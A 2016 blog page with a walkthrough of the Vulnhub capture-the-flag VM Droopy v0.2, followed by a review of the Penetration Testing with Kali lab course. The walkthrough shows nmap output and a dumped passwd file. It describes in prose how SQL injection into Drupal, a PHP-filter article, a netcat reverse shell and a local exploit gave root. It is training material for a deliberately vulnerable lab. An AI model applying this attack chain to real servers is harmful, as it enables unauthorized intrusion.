Thursday 23 June 2016

Droopy v0.2 Vulnhub

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of the VM droopy-v02,143 from Vulnhub - a site dedicated to penetration  testing Capture The Flag challenges. 

You can download the VM from  here:,143/

Best change the network to NAT.

We find the machine at .140 after running netdiscover, nmap ping scan is also an option.

After doing a quick scan we discover that there is an apache server. Let's do several scans on that. I used my script for nmap web services for that:

Starting Nmap 7.12 ( ) at 2016-06-21 08:27 EDT
Nmap scan report for
Host is up (0.00029s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-php-version: Version from header x-powered-by: PHP/5.5.9-1ubuntu4.5
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B0:71:DA

Starting Nmap 7.12 ( ) at 2016-06-21 08:27 EDT
Nmap scan report for
Host is up (0.00019s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection:
|   Possible sqli for queries:
MAC Address: 00:0C:29:B0:71:DA

Starting Nmap 7.12 ( ) at 2016-06-21 08:27 EDT
Nmap scan report for
Host is up (0.00022s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-headers:
|   Date: Tue, 21 Jun 2016 12:28:04 GMT
|   Server: Apache/2.4.7 (Ubuntu)
|   X-Powered-By: PHP/5.5.9-1ubuntu4.5
|   Expires: Sun, 19 Nov 1978 05:00:00 GMT
|   Last-Modified: Tue, 21 Jun 2016 12:28:04 +0000
|   Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
|   ETag: "1466512084"
|   Content-Language: en
|   X-Generator: Drupal 7 (
|   Connection: close
|   Content-Type: text/html; charset=utf-8
|_  (Request type: HEAD)
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B0:71:DA

Ok, let us inject then:

We are admins:

Let's enable PHP Filter.

Add an article with PHP code and don't forget to switch to interpret as PHP. Let's try this:

Great :) 

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false
gsuser:x:1000:1000:Generic User,,,:/home/gsuser:/bin/bash
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false

Let's try something more. We are in /var/www/html/

Actually I tried writing to a file after that, but since I did not want to lose much more time - I included a reverse shell and started nc on the other end. As a result:

As you see I tried several exploits here, finally one of them worked.

Inspect the root, there is a encrypted file - you can actually decrypt it - there is also a hint in the mails about it, I really don't see value in that (system is owned anyway) - but if you like go ahead.

Monday 6 June 2016

Penetration Testing with Kali - Lab review

About the course Penetration Testing with Kali. This environment was, to me, during the 90 day training period as a puzzle more or less, you get to learn a lot of new tools, techniques and tricks. If you think you know a lot about a target you will be usually wrong - it takes a lot of time and dedication to learn all weak spots. 

The Forum:
The forum is a good place to exchange experience, but don't expect much help or as whole solution to your problems  - they will be censored as spoilers, which I actually understand - however it is a good place to exchange techniques. Also this will be the place to learn about some "mythic" targets - however this does not mean that if you own them you will be the master of the whole lab, but it will bring personal satisfaction.

The Support:
Usually you will get some hint if you are stuck, but don't expect much. It is a struggle to push yourself to the limits and also get the results in time. The support usually just tells you if you are on the right track. Think how much time you have, if no results - change the target or vulnerability - at least this was my way of work, a bit chaotic. What you will get sometimes will be "Try harder" or in my case that clues are not given, but earned. 

The Lab:
The lab in fact after seeing so many examples of vulnerable machines and also services (other labs) is more than great. This is maybe the best reason to prefer this course, all machines are carefully configured with a unique set of vulnerabilities. What if I am stuck? Well think out of the box, you are not limited in the lab to use Nessus or Metasploit Community, maybe this will give you the BIG hint you were waiting for - however don't use them on the exam, read the rules.

The Tools:
Also a very valuable skill you will develop during this course is to develop your own tools for penetration testing, metasploit resource scripts to automate the process and even if you are skillful enough to make your own exploits. 

Here also some of my own tools:

What to Regret:
Things you never tried on the lab. Think of the lab and the targets inside of it as a environment to test your skills, tools and your limits.

As a whole I think this course gets you to try to develop your skills and strengths on your own, you will have to push yourself further than you think. Frustration in some cases is inevitable, but realizing how far you got and sometimes realizing that even vulnerability scanners can't get as far as you did will push you to evolve. Also very important thing to do is read and realize how much time would you waste if you have read everything you had on a target? I bet it is less.